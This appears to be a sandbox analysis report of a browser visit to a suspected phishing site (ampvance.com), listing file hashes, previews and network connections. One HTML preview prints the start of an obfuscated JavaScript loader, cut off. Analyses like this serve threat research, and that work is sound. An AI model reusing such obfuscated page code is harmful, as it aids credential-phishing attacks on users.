                                                      SHA1:569680D95F4D96D7ADD5570FB977B95F0FED7A65
                                                      SHA-256:46817172A20E26C25774708CBFC5F6E1AB0F756BF217ED3C0500DFAF558A17DD
                                                      SHA-512:D4501DD404FB0C7D8BF51DEA24CF930A541E38410DCAF8D46D482B28935C7629C2A2C2735ADA8FC2A917F73EFBB1F750E5F2DAB4B1794E1071917222B3CFA55E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://rfpcertstream.castlehillinfotech.com/favicon.ico
                                                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache Server at rfpcertstream.castlehillinfotech.com Port 443</address>.</body></html>.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):3651
                                                      Entropy (8bit):4.094801914706141
                                                      Encrypted:false
                                                      SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                      MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                      SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                      SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                      SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):3651
                                                      Entropy (8bit):4.094801914706141
                                                      Encrypted:false
                                                      SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                      MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                      SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                      SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                      SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/o/048a11303f2c0b13c71de5123e30fffb65e71ce053c02
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):1592
                                                      Entropy (8bit):4.205005284721148
                                                      Encrypted:false
                                                      SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                      MD5:4E48046CE74F4B89D45037C90576BFAC
                                                      SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                      SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                      SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):1592
                                                      Entropy (8bit):4.205005284721148
                                                      Encrypted:false
                                                      SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                      MD5:4E48046CE74F4B89D45037C90576BFAC
                                                      SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                      SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                      SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/ASSETS/img/sig-op.svg
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):1864
                                                      Entropy (8bit):5.222032823730197
                                                      Encrypted:false
                                                      SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                      MD5:BC3D32A696895F78C19DF6C717586A5D
                                                      SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                      SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                      SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/x/048a11303f2c0b13c71de5123e30fffb65e71ce053be3
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):3651
                                                      Entropy (8bit):4.094801914706141
                                                      Encrypted:false
                                                      SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                      MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                      SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                      SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                      SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/ASSETS/img/m_.svg
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (4020)
                                                      Category:downloaded
                                                      Size (bytes):4464
                                                      Entropy (8bit):5.565104931865584
                                                      Encrypted:false
                                                      SSDEEP:96:5LIkEaeIllHhD6UPYznjUC5PAv00cCv3m4oilpM:lIkTeI7h/YzjUC5Yv4phc6
                                                      MD5:649F6FF41013EADE76E3190F89806E3D
                                                      SHA1:FDD5454110FA4DD465A1BE946A16F225164D04E4
                                                      SHA-256:5833AD34224E1619A04672928085B89ACC77E3C453A38A37C38136A9ADE79CB5
                                                      SHA-512:2D1E95BCA4445E9DE1792123C6B6E3D5677635BB9EC8B9E8BE9C6137411C0FBFFB7261F92413FDFD576B81AFFF01B4B9F20F6D8700EA8C9EBF0545458D631A61
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Preview:<!DOCTYPE html>.<html>.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <title></title>. <script src="jq/048a11303f2c0b13c71de5123e30fffb65e71cdee6daf"></script>. <script src="boot/048a11303f2c0b13c71de5123e30fffb65e71cdee6db2"></script>. <script src="js/048a11303f2c0b13c71de5123e30fffb65e71cdee6db3"></script>.</head>..<script type="text/javascript">.function r(V,f){var e=I();return r=function(k,F){k=k-0x140;var G=e[k];return G;},r(V,f);}var A=r;(function(q,T){var K=r,S=q();while(!![]){try{var X=-parseInt(K('0x167'))/0x1*(parseInt(K(0x172))/0x2)+parseInt(K('0x148'))/0x3+parseInt(K(0x181))/0x4+-parseInt(K('0x15e'))/0x5+-parseInt(K('0x15f'))/0x6+parseInt(K('0x143'))/0x7+parseInt(K(0x15b))/0x8*(parseInt(K('0x180'))/0x9);if(X===T)break;else S['push'](S['shift']());}catch(y){S['push'](S['shift']());}}}(I,0x6def1));var G=(function(){var q=!![];return function(T,S){var X=q?function(){var t=r;if(S){var y=S[t('0x
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):3651
                                                      Entropy (8bit):4.094801914706141
                                                      Encrypted:false
                                                      SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                      MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                      SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                      SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                      SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 52 x 83, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):61
                                                      Entropy (8bit):4.068159130770306
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPl5st/iJ6hkxl/k4E08up:6v/lhPotw6hk7Tp
                                                      MD5:2F868838C02A026BF15A736C1C664340
                                                      SHA1:389C026BA12C204A57EB7F92DE03D23AB961C47A
                                                      SHA-256:366526B829B2378B458E5D15841F08A30C8992D1FA78C674087098B8D6E03FFC
                                                      SHA-512:6D9E6A67DF60860685B6E45CE1F532B4E10DAC79F513EB73FD0B38728BAE1762FEFB7C800A50271C6AEA4C184553104850E2D0CBB677C1A9834B2C9265E2A745
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/85fa6b76cf6e4369/1709644999735/5XCbngvQK7ffH2m
                                                      Preview:.PNG........IHDR...4...S....._.^....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):16
                                                      Entropy (8bit):3.875
                                                      Encrypted:false
                                                      SSDEEP:3:HtHKiY:RKiY
                                                      MD5:011B17B116126E6E0C4A9B0DE9145805
                                                      SHA1:DF63A6EB731FFCE96F79802EFF6D53D00CDA42BC
                                                      SHA-256:3418E6E704387A99F1611EB7BB883328A438BA600971E6D692E8BEA60F10B179
                                                      SHA-512:BB432E96AF588E0B19CBD8BC228C87989FE578167FD1F3831C7E50D2D86DE11016FB93679FEF189B39085E9151EB9A6EB2986155C65DD0FE95EC85454D32AE7D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmVnLSgo9aC3RIFDdFbUVI=?alt=proto
                                                      Preview:CgkKBw3RW1FSGgA=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32065)
                                                      Category:downloaded
                                                      Size (bytes):85578
                                                      Entropy (8bit):5.366055229017455
                                                      Encrypted:false
                                                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                      MD5:2F6B11A7E914718E0290410E85366FE9
                                                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/jq/048a11303f2c0b13c71de5123e30fffb65e71cdee6daf
                                                      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):105369
                                                      Entropy (8bit):5.240719144154261
                                                      Encrypted:false
                                                      SSDEEP:1536:l+gu2w+EEnazA/PWrF7qvEAFiQcpmQoDZztVEHn8:E6CEVEH8
                                                      MD5:8E6B0F88563F9C33F78BCE65CF287DF7
                                                      SHA1:EF7765CD2A7D64ED27DD7344702597AFF6F8C397
                                                      SHA-256:A7057BEBFFF43E7281CA31DA00D40BD88C8D02D1576B9C45891DD56A3853269A
                                                      SHA-512:7DCE31D45ACA40340490B9F437A22ADF212B049DE0D4DDEB908A50C1F5C6C7B5561323B3A93B6ED3E5A7C44D7170460BFF8D8722749191C0F5A8DBD83E093E7F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/APP-048a11303f2c0b13c71de5123e30fffb65e71ce053bdc/048a11303f2c0b13c71de5123e30fffb65e71ce053bde
                                                      Preview:html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):1864
                                                      Entropy (8bit):5.222032823730197
                                                      Encrypted:false
                                                      SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                      MD5:BC3D32A696895F78C19DF6C717586A5D
                                                      SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                      SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                      SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                      No static file info
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Mar 5, 2024 14:23:04.336277962 CET49678443192.168.2.4104.46.162.224
                                                      Mar 5, 2024 14:23:05.258122921 CET49675443192.168.2.4173.222.162.32
                                                      Mar 5, 2024 14:23:12.240688086 CET49734443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.240719080 CET44349734172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.240796089 CET49734443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.242494106 CET49735443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.242598057 CET44349735172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.242681026 CET49735443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.243411064 CET49735443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.243449926 CET44349735172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.243684053 CET49734443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.243701935 CET44349734172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.870301962 CET44349735172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.871129036 CET49735443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.871202946 CET44349735172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.871349096 CET44349734172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.871630907 CET49734443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.871645927 CET44349734172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.872757912 CET44349735172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.872836113 CET49735443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.873126030 CET44349734172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.873183012 CET49734443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.873928070 CET49735443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.874042034 CET44349735172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.874176025 CET49735443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.874317884 CET49734443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.874423027 CET44349734172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.915714979 CET49734443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.915723085 CET44349734172.105.184.142192.168.2.4
                                                      Mar 5, 2024 14:23:12.915843010 CET49735443192.168.2.4172.105.184.142
                                                      Mar 5, 2024 14:23:12.915906906 CET44349735172.105.184.142192.168.2.4
